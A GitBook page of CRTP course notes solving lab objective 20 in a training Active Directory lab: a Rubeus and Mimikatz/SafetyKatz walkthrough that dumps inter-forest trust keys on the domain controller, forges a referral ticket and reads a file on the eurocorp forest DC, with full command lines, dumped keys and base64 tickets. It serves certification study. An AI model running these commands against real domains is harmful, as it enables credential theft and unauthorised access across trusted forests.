Certified Red Team Professional (CRTP) - Notes
HomeGitHubPortfolioTwitter/XMediumCont@ct
  • 📝Certified Red Team Professional (CRTP) - Notes
    • ℹ️0 - Course Summary
    • 1️⃣1 - Active Directory (AD)
      • 1.1 - Introduction to Active Directory (AD)
      • 1.2 - Physical Components of AD
      • 1.3 - Logical Components of AD
    • 2️⃣2 - PowerShell
      • 2.1 - Introduction to PowerShell
      • 2.2 - Security and Detection
    • 3️⃣3 - AD Enumeration
      • 3.1 - Host & User Identification
      • 3.2 - Common Services Enum
        • 3.2.1 - LDAP & DNS Enum
        • 3.2.2 - SMB Enum & Common Attacks
      • 3.3 - Domain Enumeration
        • 3.3.1 - PowerView
          • 3.3.1.1 - Domain Enumeration (Video Lab)
        • 3.3.2 - BloodHound
    • 4️⃣4 - Trust and Privileges Mapping
      • 4.1 - Access Control (ACL/ACE)
      • 4.2 - Group Policy
      • 4.3 - Trusts
    • 5️⃣5 - Local Privilege Escalation
      • 5.1 - Privilege Escalation
        • 5.1.1 - Feature Abuse
        • 5.1.2 - Relaying
        • 5.1.3 - GPO Abuse
        • 5.1.4 - Unquoted Service Path
      • 5.2 - Tools
    • 7️⃣6 - Lateral Movement
      • 6.1 - PowerShell Remoting & Tradecraft
      • 6.2 - Credentials Extraction & Mimikatz
    • 9️⃣7 - Kerberos Attack and Privelege Escalation
      • 7.1 - Kerberos Intro
      • 7.2 - User Enum in Kerberos
      • 7.3 - AS-REP Roasting
      • 7.4 - Kerberoasting
      • 7.5 - Kerberos Delegation
        • Uncostrained Delegation
        • Constrained Delegation
      • 7.6 - Accross Trusts
        • Page
        • External Trust
        • Forest
        • Domain Trust
    • 8️⃣8 - Persistence
      • 8.1 - Golden Ticket
      • 8.2 - Silver Ticket
      • 8.3 - Diamond Ticket
      • 8.4 - Skeleton Key
      • 8.5 - DSRM
      • 8.6 - Custom SSP
      • 8.7 - Persistence via ACLs
        • 8.7.1 - AdminSDHolder
        • 8.7.2 - DCSync Attack
        • 8.7.3 - Security Descriptors
    • 9️⃣9 - Detection and Defense
    • Lab
      • 0 - Lab Instructions
      • 1 - LO 1️
      • 2 - LO2️
      • 3 - LO 3️
      • 4 - LO 4️
      • 5 - LO 5️
      • 6 - LO 6️
      • 7 - LO 7️
      • 8 - LO8️
      • 9 - LO9️
      • 10 - LO1️0️
      • 11 - LO1️1️
      • 12 - LO1️2️
      • 13 - LO1️3️
      • 14 - LO1️4️
      • 15 - LO1️5️
      • 16 - LO1️6️
      • 17 - LO1️7️
      • 18 - LO1️8️
      • 19 - LO1️9️
      • 20 - LO2️0️
      • 21 - LO2️1️
      • 22 - LO 2️2️
      • 23 - LO2️3️
    • 📄Report
      • How to write a PT Report
  • 🛣️RoadMap / Exam Preparation
  • 📔CRTP Cheat Sheet
Powered by GitBook
On this page
  • Tasks
  • Solutions
  • 1 - With DA privileges on dollarcorp.moneycorp.local, get access to SharedwithDCorp share on the DC of eurocorp.local forest
  • Flag 31 [eurocorp-dc] - Service for which a TGS is requested from eurocorp-dc 🚩
  • Flag 32 [eurocorp-dc] - Contents of secret.txt on eurocorp-dc 🚩
  1. Certified Red Team Professional (CRTP) - Notes
  2. Lab

20 - LO2️0️

Learning Object 20

Tasks

1 - With DA privileges on dollarcorp.moneycorp.local, get access to SharedwithDCorp share on the DC of eurocorp.local forest

Flag 31 [eurocorp-dc] - Service for which a TGS is requested from eurocorp-dc 🚩

Flag 32 [eurocorp-dc] - Contents of secret.txt on eurocorp-dc 🚩

Solutions

1 - With DA privileges on dollarcorp.moneycorp.local, get access to SharedwithDCorp share on the DC of eurocorp.local forest

We need the trust key for the trust between dollarcorp and eurocrop, which can be retrieved using Mimikatz or SafetyKatz.

Start a process with DA privileges. Run the below command from an elevated command prompt:

First to all start a process as DA:

C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args asktgt /user:svcadmin /aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt

Run the below commands from the process running as DA to copy Loader.exe on dcorp-dc and use it to extract credentials:

echo F | xcopy C:\AD\Tools\Loader.exe \\dcorp-dc\C$\Users\Public\Loader.exe /Y
winrs -r:dcorp-dc cmd
netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=172.16.100.67
C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe -args "lsadump::evasive-trust /patch" "exit"
mimikatz(commandline) # lsadump::evasive-trust /patch

Current domain: DOLLARCORP.MONEYCORP.LOCAL (dcorp / S-1-5-21-719815819-3726368948-3917688648)

Domain: MONEYCORP.LOCAL (mcorp / S-1-5-21-335606122-960912869-3279953914)
 [  In ] DOLLARCORP.MONEYCORP.LOCAL -> MONEYCORP.LOCAL
    * 5/19/2025 1:37:28 PM - CLEAR   - 44 09 6f fc 1a 4c 7f 37 6d 28 3d dd 7c 01 38 b3 8a a3 ae 67 21 86 f7 d6 cc 64 7a 84 a4 fb ec 09 63 a5 67 d0 7d 46 ae d9 d3 01 67 9d 00 93 db e6 60 63 36 aa c1 ee 12 18 c0 22 f8 d0 79 b8 b2 c5 71 91 28 98 e2 21 36 09 f5 36 02 bf 9b 60 6e 37 95 8b 79 2c e2 a4 9a a5 55 20 a6 b9 f1 30 b7 71 cb 20 5d 60 8c b9 e8 69 2a 5e cb c3 3e 22 7b a5 e6 08 f1 df 92 d3 a3 ca e0 f5 b2 5a cb 7a ad ea 41 28 a1 ff 5b b7 d3 30 79 b9 95 a0 bb 22 a6 b7 02 f4 2d 2e de fe 7c 53 80 33 5c 81 ea 06 ba c5 7d 48 3e 54 20 87 50 27 d9 07 eb d8 0b ca a6 8b b1 43 92 ca bf 00 8f 57 4f f8 85 ae 90 ab 84 91 ca 46 53 cb 4d 17 af 41 b5 44 16 7f 35 74 4a a3 a0 8e 63 74 ed 0a 8b 4e b1 7f 2e db db 00 07 d9 51 e5 68 62 72 74 29 ad 7f cd e3 2f 73 6b 89 48
        * aes256_hmac       e9a951eb9284fa8fb97d517ee1aa3aa63bedb68f047bdef968fc07909e3d3473
        * aes128_hmac       82479821a01655434a6b58c8a12ede0a
        * rc4_hmac_nt       9efbee4d5451ee87a336fdd844841a60

 [ Out ] MONEYCORP.LOCAL -> DOLLARCORP.MONEYCORP.LOCAL
    * 5/18/2025 11:05:00 PM - CLEAR   - 75 a4 95 49 95 c5 3d 16 51 d6 dd ea 1b 5e ef a4 e1 4a a4 f6 ad de 59 dd 44 23 8d f7 26 68 e6 4e 6f 47 4c c5 88 ac 28 82 44 2d c4 3d 93 5a 81 d4 1a 59 f5 19 c4 b7 c4 02 8e e6 b7 af 93 2a b9 e3 8d 6c 69 fa bf 89 f7 1b ed 62 7c cf 58 0c 39 9c 5c 81 7d aa 5c f9 83 c8 8e 99 0f 80 db 04 be 05 59 b9 17 23 14 c2 30 69 a5 97 45 98 29 18 bf da ee 67 4b 82 80 ba 46 03 78 ce 7a 25 ea 48 cb 07 c8 8e b4 f2 75 c4 45 47 6e 74 59 5d 95 7a 46 3a a8 87 27 9a 09 4f bd 0e 21 6a 01 a7 3e 6d 30 31 fc f0 e3 00 80 27 96 e6 95 d5 8a 60 71 22 f8 d8 6e 6f f9 5c 31 50 00 ee b6 d2 2f e7 82 97 aa 14 d0 32 07 8a 38 87 66 47 f6 33 3c 34 71 8f 7c f0 8c 79 30 84 35 6c 04 cd 06 fd ed 9f 4a 10 56 6d f1 4d b9 90 45 c8 25 41 a9 7f 15 a8 ea 5b a4 42
        * aes256_hmac       1be6d20275db04c936e2280d803afaf58aca9aabe04664db9484c20206590a0a
        * aes128_hmac       ceb4bb60cc4546c039ca70454cf27321
        * rc4_hmac_nt       9e01158873ab48589848840d3b4f5ba3

 [ In-1] DOLLARCORP.MONEYCORP.LOCAL -> MONEYCORP.LOCAL
    * 4/18/2025 9:04:35 PM - CLEAR   - 1a 5f 93 d7 72 ef 03 2a 0f e3 9c 22 ee 65 3f c2 bb 11 51 1d d0 3c 7a fc 91 05 79 cb 2e 27 43 11 67 a8 18 e0 24 0b aa c1 71 0f e4 dc 0c b3 66 84 79 c2 74 f6 b0 88 49 19 90 ea f3 0c 02 1e 59 97 3f aa 42 a9 66 cf 9d a8 bc a4 aa 98 b4 d4 29 c3 aa a8 5e 5a ae 0f 93 21 51 6d fd ff a8 2f da cd 8c 3c fc 4c 1d 2f 51 c4 2e 89 01 20 29 2d 9d c7 40 d5 c7 1d 19 3c 38 38 94 3f 5b 67 a6 e6 68 4b 74 a2 a3 0d 44 0c dd 62 45 e7 01 46 83 0b 15 1d af 5f 0c 81 1e b8 ac eb 6f f2 79 fd 1f db af df cc 28 72 3d 50 a0 e8 50 62 57 22 64 c8 de fe 55 ef 94 b8 1f 54 76 65 7e 8c 0a a4 1b f6 45 03 1f 78 9f 1c de cf 52 c9 34 d2 c9 a1 f9 63 23 43 7a 25 f0 1d a8 b8 9d 25 44 f3 f7 c9 4d e5 2f 88 f9 1d c5 b3 62 59 bf ba e9 ea 97 f5 fb bb a1 82 a2
        * aes256_hmac       6ebf48c7d7ad99b143c9b6ad518396606a395a60dc4165e83233a1c0c5716412
        * aes128_hmac       7217c5114ba08994c10edf30106e5ce8
        * rc4_hmac_nt       5f8e757822d6f6f2977af2dc94135713

 [Out-1] MONEYCORP.LOCAL -> DOLLARCORP.MONEYCORP.LOCAL
    * 5/18/2025 11:05:00 PM - CLEAR   - f5 ec 63 70 27 4e 2d 3b c9 cf d2 5c aa 42 3f 9e 84 43 1f ad ef 68 6f c0 0e ca 08 9f ee 7e a5 98 15 ca 17 70 e9 ee a5 02 b3 50 f5 9c fe 29 2c c1 f4 96 d3 7b f0 21 62 6b eb 3b 54 bc a3 90 99 e1 d4 1a 1a 0b 97 f1 bf d5 78 da 7e d0 cb 61 77 03 c2 08 c7 9f 9a 86 64 7b a1 0b 98 3c ba 99 bf 14 83 ff c5 f9 37 cb 1a c2 a8 1c 28 85 be 07 93 11 cb cc 35 88 5c 34 e5 d9 a1 0f ad 32 f5 e8 11 07 42 14 be 76 c3 fe 3a 77 a8 04 4c 17 ff 93 19 d0 70 ec c2 c9 0d 00 3b 2d 32 d9 d5 cc 1e f2 e0 f6 46 56 f8 cf 9c 2c 51 d8 15 f9 cd 0c d2 10 92 a8 75 af 26 8c 05 05 64 d1 be 58 03 65 3f c3 ed cd 63 05 ca 20 08 b7 09 d8 22 41 e0 a0 f7 2b 71 b7 48 ae c5 23 5b 50 d4 bf 15 a0 d4 a0 37 7d f3 d4 e3 77 93 e9 21 28 71 3d ad 9c fd 23 ce 6c 00 5d
        * aes256_hmac       8a1e8a22021baf33cf5c186b2b257cace73088402e11545ede9c112545b6c05f
        * aes128_hmac       f97130aff8d849fa56b61a80d77492b0
        * rc4_hmac_nt       e1ff686c5ac2880aaecb34a8c8db19ee


Domain: US.DOLLARCORP.MONEYCORP.LOCAL (US / S-1-5-21-1028785420-4100948154-1806204659)
 [  In ] DOLLARCORP.MONEYCORP.LOCAL -> US.DOLLARCORP.MONEYCORP.LOCAL
    * 5/18/2025 10:10:07 PM - CLEAR   - c2 86 72 f5 a4 80 98 c4 79 c5 cd 35 31 68 fa 08 a0 b9 96 e7 e9 d4 68 c5 0a 6e 9c f8
        * aes256_hmac       0d13893ad9375052e55276afd3aa59eee6ac13ecbb34ec595551a22850e5a21f
        * aes128_hmac       1f367d7f4a602f7db49b28e8954e38b3
        * rc4_hmac_nt       10abed140ecd1d7926fd8ed52141a4a9

 [ Out ] US.DOLLARCORP.MONEYCORP.LOCAL -> DOLLARCORP.MONEYCORP.LOCAL
    * 5/18/2025 10:10:07 PM - CLEAR   - c2 86 72 f5 a4 80 98 c4 79 c5 cd 35 31 68 fa 08 a0 b9 96 e7 e9 d4 68 c5 0a 6e 9c f8
        * aes256_hmac       677e0e1d4b663a16d24f8b8463d23e21a4ee23d2dab509221bf3444a95902fa1
        * aes128_hmac       54713b68042823a0d642e3c8b55f2bf3
        * rc4_hmac_nt       10abed140ecd1d7926fd8ed52141a4a9

 [ In-1] DOLLARCORP.MONEYCORP.LOCAL -> US.DOLLARCORP.MONEYCORP.LOCAL
    * 5/18/2025 10:03:57 PM - CLEAR   - 5c 54 6e 93 5d f4 37 a8 46 c7 cf 6b 33 6e 1c 39 ed 02 2f f6 4d 28 16 02 5d ec 34 08
        * aes256_hmac       d006160aeebee4bc4736932b02e2021e58e712bb614809a9e5d7a885c830ebf3
        * aes128_hmac       99e79607dc6c200854a32f6421f80e6c
        * rc4_hmac_nt       f3f9994ce98686f98d1dd8b81ec8f2cc

 [Out-1] US.DOLLARCORP.MONEYCORP.LOCAL -> DOLLARCORP.MONEYCORP.LOCAL
    * 5/18/2025 10:03:57 PM - CLEAR   - 5c 54 6e 93 5d f4 37 a8 46 c7 cf 6b 33 6e 1c 39 ed 02 2f f6 4d 28 16 02 5d ec 34 08
        * aes256_hmac       391de5a8a239c71f684355e04665f636c4b412caf5b89d7d1940e06a5a47d101
        * aes128_hmac       d39fd719f0a4e95b7b2a5c39d1c7feb2
        * rc4_hmac_nt       f3f9994ce98686f98d1dd8b81ec8f2cc


Domain: EUROCORP.LOCAL (ecorp / S-1-5-21-3333069040-3914854601-3606488808)
 [  In ] DOLLARCORP.MONEYCORP.LOCAL -> EUROCORP.LOCAL
    * 5/18/2025 10:03:52 PM - CLEAR   - 85 b0 4e 5f 8d 90 05 9b b3 1e 1a 0e a6 2f 45 9b 1e bf cb 99 c9 d9 bc f5 40 74 4f 52
        * aes256_hmac       b1d7c6ebe13f4ab22d32540e056618017544c5b2b2a646c2bd46ce98b954d279
        * aes128_hmac       e0923c5d48609d5521de83fc02ec3e4b
        * rc4_hmac_nt       348f49cf83691a35ea71980994f02170

 [ Out ] EUROCORP.LOCAL -> DOLLARCORP.MONEYCORP.LOCAL
    * 5/18/2025 10:03:52 PM - CLEAR   - 85 b0 4e 5f 8d 90 05 9b b3 1e 1a 0e a6 2f 45 9b 1e bf cb 99 c9 d9 bc f5 40 74 4f 52
        * aes256_hmac       b0f0a55ada2dfc87111ddbdc4072a8cc8679f4a5f79242f6510c57df0a65c831
        * aes128_hmac       65770a68dff396a49468fe35cbc98cbe
        * rc4_hmac_nt       348f49cf83691a35ea71980994f02170

 [ In-1] DOLLARCORP.MONEYCORP.LOCAL -> EUROCORP.LOCAL
    * 5/16/2025 9:04:55 PM - CLEAR   - 4f 60 6b c4 51 c2 54 89 39 e3 84 f9 5e 2e 51 61 65 c6 81 64 6b 66 ff 55 41 e5 27 16
        * aes256_hmac       3b0cc0612e0bed52b403f6048bc4cd86233bb75a2848aa6d24385e9b61fad2b1
        * aes128_hmac       0c32942d43e18125da040ada11ee8d5e
        * rc4_hmac_nt       4e8f18911392c26d05bc7044914a6d57

 [Out-1] EUROCORP.LOCAL -> DOLLARCORP.MONEYCORP.LOCAL
    * 5/16/2025 9:04:55 PM - CLEAR   - 4f 60 6b c4 51 c2 54 89 39 e3 84 f9 5e 2e 51 61 65 c6 81 64 6b 66 ff 55 41 e5 27 16
        * aes256_hmac       7a4cd11bc3ce3f83c5788e7dfe1e9bdd5c0187e2a793f9134e3bc1241497f7fb
        * aes128_hmac       aaaba3a50e251cbafda5bf205e9dd7ec
        * rc4_hmac_nt       4e8f18911392c26d05bc7044914a6d57


mimikatz(commandline) # exit
Bye!

Let's Forge a referral ticket.

Domain: EUROCORP.LOCAL (ecorp / S-1-5-21-3333069040-3914854601-3606488808)
 [  In ] DOLLARCORP.MONEYCORP.LOCAL -> EUROCORP.LOCAL
    * 5/18/2025 10:03:52 PM - CLEAR   - 85 b0 4e 5f 8d 90 05 9b b3 1e 1a 0e a6 2f 45 9b 1e bf cb 99 c9 d9 bc f5 40 74 4f 52
        * aes256_hmac       b1d7c6ebe13f4ab22d32540e056618017544c5b2b2a646c2bd46ce98b954d279
        * aes128_hmac       e0923c5d48609d5521de83fc02ec3e4b
        * rc4_hmac_nt       348f49cf83691a35ea71980994f02170

Note that we are not injecting any SID History here as it would be filtered out. Run the below command:

C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args evasive-silver /service:krbtgt/DOLLARCORP.MONEYCORP.LOCAL /rc4:348f49cf83691a35ea71980994f02170 /sid:S-1-5-21-719815819-3726368948-3917688648 /sids:S-1-5-21-335606122-960912869-3279953914-519 /ldap /user:Administrator /nowrap
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

Copy the base64 encoded ticket from above and use it in the following command:

C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args asktgs /service:cifs/eurocorp-dc.eurocorp.LOCAL /dc:eurocorp-dc.eurocorp.LOCAL /ptt /ticket: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

Once the ticket is injected, we can access explicitly shared resources on eurocorp-dc.

type \\eurocorp-dc.eurocorp.local\SharedwithDCorp\secret.txt
dir \\eurocorp-dc.eurocorp.local\SharedwithDCorp\

Note that the only way to enumerate accessible resources (service on a machine) in eurocorp would be to request a TGS for each one and then attempt to access it.

Flag 31 [eurocorp-dc] - Service for which a TGS is requested from eurocorp-dc 🚩

Based on the following command:

C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args asktgs /service:cifs/eurocorp-dc.eurocorp.LOCAL /dc:eurocorp-dc.eurocorp.LOCAL /ptt /ticket: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

cifs is the service for which a TGS is requested from eurocorp-dc.

Flag 32 [eurocorp-dc] - Contents of secret.txt on eurocorp-dc 🚩

type \\eurocorp-dc.eurocorp.local\SharedwithDCorp\secret.txt

Dollarcorp DAs can read this!

Previous19 - LO1️9️Next21 - LO2️1️

Last updated 17 days ago

📝